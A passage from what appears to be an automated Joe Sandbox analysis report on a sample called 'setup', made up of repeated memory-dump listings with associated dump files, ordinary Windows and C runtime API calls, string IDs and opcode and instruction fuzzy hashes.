                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$malloc
                                                                                                    • String ID: outofmem
                                                                                                    • API String ID: 2190258309-748900114
                                                                                                    • Opcode ID: 17e77bab24c9a7501767020985c109a3839f3b1d6d9963df3f5a9df48b305a13
                                                                                                    • Instruction ID: 5f7c1270bcde3ee6ddab70819377706265b25b480537d3e14aed92b13733c921
                                                                                                    • Opcode Fuzzy Hash: 17e77bab24c9a7501767020985c109a3839f3b1d6d9963df3f5a9df48b305a13
                                                                                                    • Instruction Fuzzy Hash: 5541FF70A087408BD3609F29D48561EBBF1FFC5344F51892DFAE586261D732D8659F82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID: `D
                                                                                                    • API String ID: 1294909896-1070873967
                                                                                                    • Opcode ID: 7919d9e611f17c78f1a8f3da3ddbc695046e9b2304c4fd92ddf5401092744702
                                                                                                    • Instruction ID: 826244cede11f3ffdef73b6b5b83a1177624ffcfb9ba7b07ffbd7bf933a0cebb
                                                                                                    • Opcode Fuzzy Hash: 7919d9e611f17c78f1a8f3da3ddbc695046e9b2304c4fd92ddf5401092744702
                                                                                                    • Instruction Fuzzy Hash: 743156B86247019FE714EF3AE98571AB7E0FB45304F41483DE84087326D775A859CF96
                                                                                                    APIs
                                                                                                      • Part of subcall function 0020D060: strcpy.MSVCRT(00000000,?,?,0020EE04), ref: 0020D083
                                                                                                      • Part of subcall function 0020D060: strcat.MSVCRT(00000000,?,?,0020EE04), ref: 0020D09A
                                                                                                    • strcpy.MSVCRT ref: 0020ECFF
                                                                                                    • CharToOemW.USER32 ref: 0020ED35
                                                                                                    • _wmkdir.MSVCRT ref: 0020ED8B
                                                                                                    • strlen.MSVCRT ref: 0020EE1B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strcpy$Char_wmkdirstrcatstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3043065097-0
                                                                                                    • Opcode ID: 6884d3a2761db872b8b1dd8be9d80b07eb2fddb66611fdd93295451d94537d16
                                                                                                    • Instruction ID: 2c41a8392ef221156d1887c6e6100b8831864fb7bd73fd1d56e30714c193139f
                                                                                                    • Opcode Fuzzy Hash: 6884d3a2761db872b8b1dd8be9d80b07eb2fddb66611fdd93295451d94537d16
                                                                                                    • Instruction Fuzzy Hash: 0D313975A147158FCB14DF28C18476AB7E2BF85310F19886DDD889B34AD731E8A6CB82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: read$write
                                                                                                    • API String ID: 3510742995-1125055369
                                                                                                    • Opcode ID: 19234e62956efd4edfbf08e30b0ae567fde6ac051d2b5c69381b52a6a551e7b9
                                                                                                    • Instruction ID: 529a4f481c7b3f0f6466d279ccee06bcd36b6aa7be1bf2065f4a8d53a20b5827
                                                                                                    • Opcode Fuzzy Hash: 19234e62956efd4edfbf08e30b0ae567fde6ac051d2b5c69381b52a6a551e7b9
                                                                                                    • Instruction Fuzzy Hash: 6A21D131A053089FCB159F29D98022AF7E0FF84721F48846EEE588B346E330E850CF62
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ImageLoadcallocfree
                                                                                                    • String ID: $D$Invalid standard cursor 0x%08X
                                                                                                    • API String ID: 4237563563-2996776654
                                                                                                    • Opcode ID: 8ef5963794bca3decf4e5b4459837268a701932a8ae805c74a54cd50dd3da887
                                                                                                    • Instruction ID: a729e0da8db63b357733ca6c252a0d02ef8f92fe500ebe09e86994fa049b0bc0
                                                                                                    • Opcode Fuzzy Hash: 8ef5963794bca3decf4e5b4459837268a701932a8ae805c74a54cd50dd3da887
                                                                                                    • Instruction Fuzzy Hash: 16316774638B11CBD728EF25D5D072ABBE0FB4474CF11886DE5894B201C7B5A8E49F8A
                                                                                                    APIs
                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0032FA0F
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 0032FA6A
                                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 0032FA85
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 0032FAD9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalDeleteSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 166494926-0
                                                                                                    • Opcode ID: 89d50c73ba8d4411755ac8305afe704418a691df41e778725f8fc455be3091c2
                                                                                                    • Instruction ID: 0219552b55e00a6d288cee5845a63879f9d4145ff196532fb1dbfa9744307284
                                                                                                    • Opcode Fuzzy Hash: 89d50c73ba8d4411755ac8305afe704418a691df41e778725f8fc455be3091c2
                                                                                                    • Instruction Fuzzy Hash: E521F8B55187558FC721AFB4E5846AEBBF8BF44340F420D3DD48887602EB30A584CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freestrcpy
                                                                                                    • String ID: write
                                                                                                    • API String ID: 2886119151-2104195679
                                                                                                    • Opcode ID: 1579e5c17d4a0e2745e7cf72423098ccc6cda58b4e25031e0f3262eefa06d5d3
                                                                                                    • Instruction ID: 73161d67abddd64106efb1aa107eed291233d883f34de6bd4ba2838b45bb73e9
                                                                                                    • Opcode Fuzzy Hash: 1579e5c17d4a0e2745e7cf72423098ccc6cda58b4e25031e0f3262eefa06d5d3
                                                                                                    • Instruction Fuzzy Hash: 6E2190B08087458BC714DF29D88115EB7E0BB48328F648F6DF498DB341C334DA90CB86
                                                                                                    APIs
                                                                                                      • Part of subcall function 0032DE40: malloc.MSVCRT ref: 0032DE4E
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,002801AF), ref: 00330710
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330718
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330720
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330728
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort$malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 990937270-0
                                                                                                    • Opcode ID: c9eed0d3e6a9d6e368dfdc4db91f25ab840e2b99a8b03cab46906a49dbd618c1
                                                                                                    • Instruction ID: c2d41ae790a3a8ef0a13c1e176d17a06c40881adc548e201a59702019eadde71
                                                                                                    • Opcode Fuzzy Hash: c9eed0d3e6a9d6e368dfdc4db91f25ab840e2b99a8b03cab46906a49dbd618c1
                                                                                                    • Instruction Fuzzy Hash: 3D116DB48283168BCB02BF64D0D626EFBE0AF43344F525C2CA6946F256DF749448CF56
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __p__commode__p__fmode__set_app_type
                                                                                                    • String ID:
                                                                                                    • API String ID: 3338496922-0
                                                                                                    • Opcode ID: 730b4f10deb8fc520d64398120327fd09955d67289f88d4815eb13be90b293c8
                                                                                                    • Instruction ID: e615974c14409f10cd2456576ba2b86a6ff98fe46367328089c6353bef4b711d
                                                                                                    • Opcode Fuzzy Hash: 730b4f10deb8fc520d64398120327fd09955d67289f88d4815eb13be90b293c8
                                                                                                    • Instruction Fuzzy Hash: 0321DEF0980301DFD314EF20C451BA637E0BB55349F69886CE8084B25BE77AD8E6DB92
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unicode$ByteCharMultiVirtualWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 4148918737-0
                                                                                                    • Opcode ID: 9b5ad486b14d93b0d1eca43a768e4daffac9eff9bb7306bdf57f32ba0cf97458
                                                                                                    • Instruction ID: 3f3f332451408e60535c6d92a11343530d9efa2320077aa7ccfa3b5d8a5c0aee
                                                                                                    • Opcode Fuzzy Hash: 9b5ad486b14d93b0d1eca43a768e4daffac9eff9bb7306bdf57f32ba0cf97458
                                                                                                    • Instruction Fuzzy Hash: 3621C4B04183069FD314EF29D58836EBFF0BF81705F508A1EE89987252D3B989589F83
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
